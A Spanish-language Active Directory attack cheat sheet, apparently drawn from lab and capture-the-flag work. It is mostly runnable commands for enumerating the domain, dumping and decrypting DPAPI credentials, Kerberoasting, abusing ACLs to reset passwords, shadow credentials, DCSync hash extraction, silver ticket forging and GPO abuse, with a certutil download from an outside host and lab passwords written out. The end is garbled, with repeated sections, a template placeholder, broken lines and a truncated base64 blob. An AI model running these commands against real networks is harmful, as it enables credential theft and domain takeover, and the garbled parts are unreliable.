Directorio Activo
Con que tengamos acceso remoto al DC con un usuario, ya podemos tener shell en el resto de usuarios con runas
Set-Execution Policy Bypass -Scope Process
BloodHound
cd /BloodHound
docker compose up
||
sudo neo4j start
./BloodHound
SharpHound
Set-ExecutionPolicy Bypass -Scope Process -Force
upload /ruta .
Import-Module .\Sharp
sudo ntpdate -u IP-DC
bloodhound-python -d DOMAIN -ns IP -u USER -p PASS -c All --zip
sudo ntpdate -u IP-DC
bloodhound-python -d DOMAIN -dc DC.DOMAIN -ns IP -u 'USER' -p PASS -c All --zip
ns para resolver nombres
PowerView
Set-ExecutionPolicy Bypass -Scope Process -Force
upload /ruta .
. .\PowerView.ps1
certutil -urlcache -f http://IP:PORT/SharpHound.exe SharpHound.exe
Dumpear DPAPI creds
🔐 DPAPI almacena credenciales por usuario, pero también puede incluir credenciales de otros usuarios si se han utilizado en la sesión.
Por ejemplo:
- Si el usuario
steph.cooperusó credenciales desteph.cooper_admpara acceder a recursos de red, hacer RDP o ejecutar procesos como otro usuario (runas, etc.), esas credenciales pueden quedar almacenadas en su perfil local mediante el Credential Manager.
📦 ¿Qué son los credential blobs?
Los archivos que estás dumpeando (credential.blob) provienen del almacenamiento de credenciales del usuario actual, que se encuentra en:
%APPDATA%\Microsoft\Credentials\
Ese directorio contiene archivos que pueden incluir:
-
Contraseñas usadas para acceder a recursos SMB
-
Tickets de RDP
-
Credenciales de RunAs
-
Otras entradas de red
Incluso si pertenecen a otro usuario, si fueron usadas por steph.cooper, quedan en su perfil.
📁 Ejemplo típico
Usuario steph.cooper hace esto:
runas /user:steph.cooper_adm cmd.exe
O usa RDP con steph.cooper_adm. Entonces, Windows guarda esas credenciales en el perfil de steph.cooper, en Microsoft\Credentials, cifradas con la masterkey de steph.cooper.
Tú las extraes y las descifras con la clave de steph.cooper, y obtienes... la contraseña de steph.cooper_adm.
Procedimiento :
python3.11 -m venv donpapi-env
source donpapi-env/bin/activate
pip install donpapi
sudo ntpdate dc.puppy.htb
donpapi collect -u admin -p 'Password123!' -d domain.local -t ALL --fetch-pvk
donpapi collect -u USER -p 'PASS' --dc-ip IP --domain DOMAIN -t ALL -k
nxc smb IP -u DOMAIN\USER -p S --dpapi nosystem -k -d DOMAIN
Si lo dearriba no tiene nada / no funca :
cd C:\users\USER\appdata\roaming\microsoft\credentials
download C4BB96844A5C9DD45D5B6A9859252BA6
cd C:\Users\USER\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115
download
python3 dpapi.py masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password PASS
python3 dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
||
$path = "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"
[Convert]::ToBase64StringReadAllBytes($path) | Out-File -Encoding ASCII 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
download 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
base64 -d out.txt > masterkey.blob
impacket-dpapi masterkey -file masterkey.blob -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107
$path = "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9"
[Convert]::ToBase64StringReadAllBytes($path) | Out-File -Encoding ASCII 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
download 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
base64 -d out.txt > credential.blob
impacket-dpapi credential -file credential.blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Para obtener la contraseña de una cuenta de tipo GMSA usando autenticación por kerberos
python3.12 -m venv bloodyenv
source bloodyenv/bin/activate
pip install bloodyAD
bloodyAD --host DC.DOMAIN -d "DOMAIN" --dc-ip IP -k get object 'GMSA01
Para añadir un usuario a un grupo usando autenticación por kerberos
```bash
python3.12 -m venv bloodyenv
source bloodyenv/bin/activate
pip install bloodyAD
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
WriteOwner
Si tienes permiso WriteOwner, puedes cambiar el propietario del objeto sobre el que tienes WriteOwner a ti mismo, para así luego ponerle GenericAll por ejemplo.
bloodyAD --host $dc -d $domain -u $username -p $password set owner $ObjetoACambiarPropietario $NuevoPropietario
bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DNdelObjetoSobreElQueQueremosTenerGenericAll $userAtacante
DCsync
-
Simulación de replicación: Un atacante con los permisos adecuados en un controlador de dominio (usualmente, un Administrador de dominio o Administrador de Enterprise) puede usar herramientas como Mimikatz para simular el proceso de replicación de un controlador de dominio.
-
Extracción de contraseñas: Al realizar una replicación del dominio, el atacante puede solicitar contraseñas de cuentas, hashes de contraseñas y otros atributos de las cuentas de usuario (como las contraseñas almacenadas en el atributo
msDS-ReplicatorPasswords). -
Uso de herramientas: Mimikatz es una de las herramientas más utilizadas para ejecutar un ataque DCsync. Al emplear la funcionalidad de
lsadump::dcsyncen Mimikatz, el atacante puede recuperar las contraseñas de los usuarios de la base de datos de Active Directory, incluida la cuenta de Administrator o cuentas con privilegios elevados.
Generic All
-
Nos da control total sobre un usuario
-
Por tener GenericAll sobre un grupo no tenemos GenericAll sobre los integrantes
Para cambiar su contraseña:
net user michael michael /domain
Kerberoast (PRIMERA FORMA)
Set-ADUser -Identity VICTIM -Add @{servicePrincipalName="foobar/xd"}
$SecPassword = ConvertTo-SecureString '
PASS FROM USER WITH GENERICWRITE' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USER FROM USER WITH GENERICWRITE', $SecPassword)
Get-DomainSPNTicket -SPN "foobar/xd" -C
redential $Cred
AS-REPRoast (SEGUNDA FORMA)
python3.12 -m venv bloodyenv
source bloodyenv/bin/activate
pip install bloodyAD
bloodyAD --host DC.DOMAIN -d "DOMAIN" --dc-ip IP -k add uac USERNAME -f DONT_REQ_PREAUTH #Habilitamos DONT REQ PREAUTH
bloodyAD --host DC.DOMAIN -d "DOMAIN" --dc-ip IP -k remove uac SVC_ARK -f ACCOUNTDISABLE #Nos aseguramos de que no están inactivas
impacket-GetNPUsers DOMAIN/ -no-pass -usersfile validUsers.txt
Podemos añadir al usuario P.AGILA SERVICE ACCOUNTS
python3.12 -m venv bloodyenv
source bloodyenv/bin/activate
pip install bloodyAD
bloodyAD --host IP -d DC.DOMAIN -u USER -p PASS add groupMember 'SERVICE ACCOUNTS' USER
ForceChangePassword
Crackear hash
git clone https://github.com/ShutdownRepo/targetedKerberoast.git
sudo ntpdate -u IP-DC
python3 targetedKerberoast.py -v -d $domain -u $user -p $pass --request-user michael -o michael.kerb
Cambias pass
rpcclient -U USER IP
rpcclient -U 'DOMAIN\USER%HASH' --pw-nt-hash IP
setuserinfo2 USER 23 'PASS'
net rpc password "USER" -U "DOMAIN"/USER%PASS -S "IP"
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
WriteSPN
git clone https://github.com/ShutdownRepo/targetedKerberoast.git
sudo ntpdate -u IP-DC
python3 targetedKerberoast.py -v -d $domain -u $user -p $pass --request-user michael -o michael.kerb
Con kerberos:
kinit user@domain
python3 targetedKerberoast.py -v -d DOMAIN --dc-ip IP --dc-host DC.DOMAIN -u 'USER' --request-user VICTIM -o VICTIM.kerb -k --no-pass
GenericWrite
- Vamos a hacerle kerberoast:
Set-ADUser -Identity VICTIM -Add @{servicePrincipalName="foobar/xd"}
$SecPassword = ConvertTo-SecureString '
PASS FROM USER WITH GENERICWRITE' -AsPlainText -Force
$Cred = New-Object System.Management.Au
tomation.PSCredential('DOMAIN\USER FROM USER WITH GENERICWRITE', $SecPassword)
Get-DomainSPNTicket -SPN "foobar/xd" -Credential $Cred
O así
git clone https://github.com/ShutdownRepo/targetedKerberoast.git
sudo ntpdate -u IP-DC
python3 targetedKerberoast.py -v -d $domain -u $user -p $pass --request-user michael -o michael.kerb
o así:
bloodyAD --dc-ip IP -d DOMAIN --host DC.DOMAIN -u 'USER' -p 'PASS' set object 'USER TO KERBEROAST' servicePrincipalName -v 'domain/meow' -k
- Añadirnos a un grupo sobre el que tenemos Generic Write
python3.12 -m venv bloodyenv
source bloodyenv/bin/activate
pip install bloodyAD
bloodyAD --host IP -d DC.DOMAIN -u USER -p PASS add groupMember 'SERVICE ACCOUNTS' USER
bloodyAD --dc-ip IP -d DOMAIN_REALM --host DC.DOMAIN -u 'USER' -p 'PASS' -k add groupMember 'GROUP' 'USER'
- Credenciales en la sombra
Las credenciales en la sombra son una técnica de persistencia y escalada de privilegios en Active Directory que consiste en inyectar un certificado tuyo en una cuenta de AD (como winrm_svc), usando el atributo:
msDS-KeyCredentialLink
Una vez inyectado, puedes autenticarse como esa cuenta usando Kerberos/PKINIT, sin necesidad de su contraseña o hash.
sudo ntpdate -u IP-DC
certipy shadow auto -u 'USER@DOMAIN' -p 'PASS' -account 'victim on which the user has Generic Write' -dc-ip DC IP
Con kerberos:
sudo ntpdate -u IP-DC
bloodyAD --host DC.DOMAIN -d DOMAIN -u USER -k add shadowCredentials 'victim on which the user has Generic Write'
python3 PKINITtools/gettgtpkinit.py -cert-pem cert.pem -key-pem priv.pem domain/user user.ccache
AddMember
Da opción de añadir miembros a un grupo como de quitar miembros.
bloodyAD --dc-ip IP -d DOMAIN_REALM --host DC.DOMAIN -u 'USER' -p 'PASS' -k add groupMember 'GROUP' 'USER'
bloodyAD --dc-ip IP -d DOMAIN_REALM --host DC.DOMAIN -u 'USER' -p 'PASS' -k remove groupMember 'GROUP' 'USER'
ReadGMSAPassword
ReadGMSAPassword es una función de Windows (más específicamente de Active Directory) que se refiere a la capacidad de leer la contraseña de una cuenta de servicio administrada de grupo, conocida como gMSA (Group Managed Service Account).
🔐 ¿Qué es una gMSA?
Una gMSA (Group Managed Service Account) es un tipo especial de cuenta en Active Directory que:
-
Es administrada automáticamente por el dominio (incluye rotación automática de contraseñas).
-
Está diseñada para servicios o aplicaciones que corren en múltiples servidores.
-
Su contraseña es conocida solo por el sistema, y normalmente no accesible para los humanos.
📥 ¿Qué hace ReadGMSAPassword?
La permisión ReadGMSAPassword determina qué equipos o usuarios tienen permitido leer (recuperar) la contraseña cifrada de una cuenta gMSA desde el Controlador de Dominio (DC).
Un equipo o servicio que tiene esta capacidad puede:
-
Solicitar la contraseña de la gMSA al DC.
-
Utilizar esa contraseña para autenticarse como la gMSA.
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword
ReadLAPSPassword
nxc ldap 192.168.247.122 -u 'fmcsorley' -p 'CrabSharkJellyfish192' -d 'hutch.offsec' -M laps
DCSync
impacket-secretsdump DOMAIN/USER:PASS@IP
evil-winrm -i IP -u USER -H "SEGUNDA PARTE HASH (NTLM)"
Kerberos
impacket-secretsdump DOMAIN/'USER'@DC.DOMAIN -k -no-pass -dc-ip IP
Buscar objetos borrados 🗑️
Y posteriormente restablecerlos, quizás sea necesario habilitarlos
Get-ADObject -IncludeDeletedObjects -Filter 'ObjectClass -like "user"' -Properties *
Restore-ADObject -Identity "938182c3-bf0b-410a-9aaa-45c8e1a02ebf"
bloodyAD --host DC.DOMAIN -d DOMAIN -u USER -p 'PASS' remove uac 'TARGET USER' -f ACCOUNTDISABLE
rpcclient -U 'USER%PASS' IP -c 'setuserinfo2 TARGETUSER 23 'PASS'
Rebuscar en la papelera de reciclaje local 🗑️
$shell = New-Object -ComObject Shell.Application
$recycleBin = $shell.Namespace(0xA)
$recycleBin.items() | Select-Object Name, Path
Restore deleted file
$recycleBin = (New-Object -ComObject Shell.Application).NameSpace(0xA)
$items = $recycleBin.Items()
$item = $items | Where-Object {$_.Name -eq "wapt-backup-sunday.7z"}
$documentsPath = [Environment]::GetFolderPath("Desktop")
$documents = (New-Object -ComObject Shell.Application).NameSpace($documentsPath)
$documents.MoveHere($item)
Silver Ticket Attack 🎟️
If you compromise an account's password with a SPN you can use that password to create a Silver Ticket impersonating any user to that service.
Delegation vs Direct Access: Directly connecting to the MSSQL service using a password relies on the permissions assigned to the **svc_mssql** account within SQL Server. This includes permissions defined in roles, explicit grants, or denies, etc. The MSSQL service checks the account's permissions within the context of SQL Server.
Silver Ticket and Service Account: Crafting a silver ticket means you're effectively impersonating the **svc_mssql** service account at the Kerberos authentication level. In the context of MSSQL, this account might have been configured (often mistakenly) with higher or sysadmin privileges, especially if it's the account used to run the SQL Server service. This can often be the case
Procedimiento
- Para obtener el nthash en base a la contraseña:
- Para obtener el SPN:
impacket-GetUserSPNs DOMAIN/USER:PASS -request
Get-ADUser -Filter {SamAccountName -eq "SVC_ACCOUNT"} -Properties ServicePrincipalNames
- Para obtener el SID
impacket-lookupsid USER@DOAMIN -target-ip IP -domain-sids
/etc/krb5.conf
[libdefaults]
default_realm = NAGOYA-INDUSTRIES.COM
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
dns_canonicalize_hostname = false
fcc-mit-ticketflags = true
[realms]
NAGOYA-INDUSTRIES.COM = {
kdc = nagoya.nagoya-industries.com
}
[domain_realm]
.nagoya-industries.com = NAGOYA-INDUSTRIES.COM
impacket-ticketer -nthash NTHASH -domain-sid SID -domain DOMAIN -spn MSSQL/DC.DOMAIN -user-id 500 Administrator
export KRB5CCNAME=Administrator.ccache
Por eiemplo
impacket-mssqlclient -k DC.DOMAIN
-
Qué hace un silver ticket
-
Cuando forjas un silver ticket estás creando un TGS (Ticket-Granting Service) para un SPN concreto (p. ej.
MSSQL/nagoya...). -
Ese TGS se cifra con la clave de la cuenta de servicio asociada al SPN (es decir, el NT hash de la cuenta bajo la que corre MSSQL o la cuenta mapeada al SPN).
-
Por tanto, el receptor lógico del ticket —el servicio que tiene la clave— puede descifrarlo y verificar su integridad.
-
-
Quién valida el ticket al llegar
-
El servidor de aplicación (o su proceso de autenticación —ej. LSASS en Windows/SQL Server) recibe el ticket y lo descifra con la clave del service account.
-
Si el descifrado es correcto y las comprobaciones locales que haga el servicio pasan, el servicio te “acepta” como la identidad que figura en el ticket.
-
No hace falta que el KDC (
krbtgt) haya emitido ese ticket porque el servicio sólo necesita poder descifrar/verificarlo con su propia clave.
-
-
Entonces… ¿qué papel tiene
krbtgtnormalmente?-
En un flujo Kerberos legítimo, el KDC (mediante la clave
krbtgt) firma/autoriza el PAC y emite tickets. Esa firma permite a servicios confiar en las memberships/atributos dentro del PAC. -
Al forjar un silver ticket se salta la emisión por el KDC; por eso la firma del KDC sobre el PAC no estará presente o no será válida. Algunos servicios comprueban esa firma; otros no.
-
-
Por qué algunos servicios aceptan el ticket aun sin krbtgt
-
Muchos servicios / configuraciones sólo requieren que el ticket se descifre correctamente con la clave del SPN y no validan la firma del PAC contra el KDC. En esos casos aceptan los SIDs/memberships que trae el ticket.
-
Otros servicios (o configuraciones más estrictas) sí verifican la validez del PAC o consultan al DC para confirmar atributos; en esos casos el silver ticket puede fallar o comportarse de forma limitada.
-
-
Resumen en una línea
- No te estás “autenticando contra
krbtgtporque no necesitas que el KDC te entregue el ticket: te estás autenticando contra el servicio objetivo (la cuenta/SPN) que posee la clave usada para cifrar y descifrar ese ticket.**
- No te estás “autenticando contra
Default Domain Policy - Generic Write
SharpGPOAbuse/SharpGPOAbuse-master at main · byronkg/SharpGPOAbuse · GitHub
.\SharpGPOAbuse.exe --AddLocalAdmin --GPOName "Default Domain Policy" --UserAccount USERNAME
gpupdate /force
whoami
Unconstrained Delegation
Imagina un escenario común de 3 niveles:
- Usuario: Un empleado.
- Servicio Front-end: Un servidor web (Ej: IIS).
- Servicio Back-end: Un servidor de base de datos (Ej: SQL Server).
El usuario accede al servidor web. El servidor web necesita consultar la base de datos en nombre del usuario (para aplicar sus permisos).
Con la Delegación No Restringida, se marcaba la cuenta del servidor web como "Confiable para delegación" (Trusted for Delegation) en AD.
- El Riesgo 🚨: Si un atacante comprometía el servidor web (Front-end), obtenía un poder inmenso. Podía suplantar a cualquier usuario (incluido un Administrador de Dominio que hubiera iniciado sesión en el servidor web) y usar esa identidad para acceder a cualquier otro servicio en el dominio (controladores de dominio, servidores de archivos, etc.). Era un "cheque en blanco".
Constrained Delegation
Se especifica una lista blanca de servicios a los que puede acceder el Front-end (solo al servicio de bases de datos)
Kerberos Constrained Delegation (KCD) Tradicional
Se edita el atributo msDS-AllowedToDelegateTo del Front-end con una lista de SPNs a los que permite acceder
Resource-Based Constrained Delegation (RBCD)
Se editaría el atributo msDS-AllowedToActOnBehalfOfOtherIdentity en el backend esta vez. Esto lista las cuentas de servicio o máquinas que tienen permiso para delegar hacia el backend.
El dueño del backend decide que frontends pueden suplantar usuarios para acceder a su backend.
Sobre el ordenador sobre el que podemos modificar msDS-AllowedToActOnBehalfOfOtherIdentity
Set-ADComputer 'DC
"Soy `COMPUTER$`, y quiero que me des un ticket de servicio como si yo fuera el usuario `backupadmin`":
```bash
impacket-getST -spn 'cifs/DC.DOMAIN' -impersonate backupadmin -dc-ip IP -k 'DOMAIN/COMPUTER$:Password'
--attr msDS-ManagedPassword
Para añadir un usuario a un grupo usando autenticación por kerberos
{{CODE_BLOCK_13}}
# **WriteOwner**
Si tienes permiso WriteOwner, puedes cambiar el propietario del objeto sobre el que tienes WriteOwner a ti mismo, para así luego ponerle GenericAll por ejemplo.
<img src="data:image/png;base64,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
